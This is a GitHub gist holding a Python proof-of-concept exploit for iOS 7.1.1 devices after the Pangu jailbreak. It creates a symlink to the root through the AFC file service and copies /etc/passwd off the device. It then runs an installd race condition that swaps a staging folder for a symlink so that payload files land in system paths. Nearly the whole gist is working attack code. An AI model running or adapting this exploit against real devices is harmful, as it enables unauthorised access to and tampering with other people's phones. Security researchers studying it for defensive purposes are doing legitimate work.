Skip to content

Instantly share code, notes, and snippets.

@PythEch PythEch/pwn.py
Created Jul 1, 2014

Embed
What would you like to do?
#! /usr/bin/env python
"""
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from pymobiledevice.afc import AFCClient
from pymobiledevice.lockdown import LockdownClient
from zipfile import ZipFile
# THANKS evaders, uh and Pangu!
# On 7.1.1 jb, I CAN HAS SYMLINK TO / again.
lockdown = LockdownClient()
afc=AFCClient(lockdown)
afc.make_directory("Downloads/a/a/a/a/a/")
afc.make_link("../../../../../", "Downloads/a/a/a/a/a/.haxx")
afc.file_rename("Downloads/a/a/a/a/a/.haxx", ".haxx")
# Lemme grab your root password...
# j/k
with open('passwd', 'wb') as f:
f.write(afc.get_file_contents('.haxx/etc/passwd'))
# LET'S PWN THE DEVICE!
# evasi0n7 installd race condition
#prepare zip
with ZipFile('pwned.zip', 'w') as payload:
payload.write('payload/hi', '/var/mobile/Preferences/hi')
payload.write('payload/bigfile', '/var/tmp/bigfile')
def get_staging():
try:
return next(x for x in afc.read_directory(".haxx/tmp/") if x.startswith("install_staging"))
except StopIteration:
return get_staging()
def install_ipa_and_race():
afc.set_file_contents("/pwned.zip", open("pwned.zip",'rb').read())
mci = lockdown.startService("com.apple.mobile.installation_proxy")
mci.sendPlist({
'Command': 'Install',
'PackagePath': "pwned.zip"
})
#HAXX
staging = ".haxx/tmp/%s/foo_extracted" % get_staging()
afc.file_rename(staging, staging+".old")
afc.make_link("../../../", staging)
while 1:
z = mci.recvPlist()
if not z or z.get('Error'):
break
if "bigfile" not in afc.read_directory(".haxx/tmp/"):
print "Unsuccessful"
install_ipa_and_race()
install_ipa_and_race()
print "Done!"
afc.file_remove('.haxx/tmp/bigfile')
raw_input()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.